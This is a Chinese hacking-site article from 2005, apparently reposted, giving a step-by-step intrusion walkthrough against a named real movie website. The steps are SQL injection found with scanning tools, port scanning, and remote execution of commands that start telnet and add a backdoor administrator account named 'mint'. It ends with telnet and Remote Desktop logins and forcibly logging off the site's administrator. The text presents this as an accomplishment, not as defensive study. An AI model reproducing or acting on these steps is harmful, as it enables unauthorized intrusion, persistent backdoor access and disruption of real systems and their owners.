首 页文章中心黑客工具黑吧学院技术论坛安全培训免费频道最近更新瑞星在线杀毒黑吧百度繁體中文
  设为首页
加入收藏
发布作品
   
栏目导航
· 漏洞利用 · 脚本注入
· 入侵实例 · 编程代码
· 逆向工程
热门文章
· 如何封别人QQ
· 充QQ币的疯狂——宽...
· 免费得QB
· 400秒远程攻破你的Q...
· [图文] QQ免费建400个群
· [组图] 给你一台永远不关机...
· [注意] QQ宠物砸蛋秘诀
· 再次有机会免费获得...
· 想的挂QQvip的进
· 在QQ中将自己从对方...
相关文章
· 利用注入漏洞获得密...
利用注入漏洞获得密码
作者:佚名  来源:转载  发布时间:2005-12-23 9:56:23  发布人:黑客动画吧

减小字体 增大字体

 

操作过程
1,查找一个电影网站。
http://www.22see.com/

2,利用ascscan查找网页可以利用的注入点。

3,使用NB2注入工具进行注入

4,使用ping命令得到www.22see.com的ip地址

5,使用端口扫描器扫描ip开放的端口。发现开放
3389,对方管理员看来安全意识很差。使用终端服务却不修改默认3389端口。

6,使用nb2的sql工具。远程执行dos命令

net start telnet                                       开telnet服务

net user mint mint /add                                添加用户mint密码为mint

net localgroup administrators mint /add                将帐号mint升级为管理员

7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

11,修改cmd的快捷方式属性为允许其他身份登陆。

12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

13,telnet对方ip.直接可以登陆对方电脑了。
使用命令
c:\query user                  查看对方目前终端登陆状况。

运行命令
c:\logoff 1                     踢出去一个管理者

再用c:\query user检查一便~~
ok了

14,使用3389远程终端登陆。

[ ] [返回上一页] [打 印] [收 藏]
 
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布
互联网备案登记:粤ICP备05008775号
友情提示:浏览本站,请使用IE6.0浏览,并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .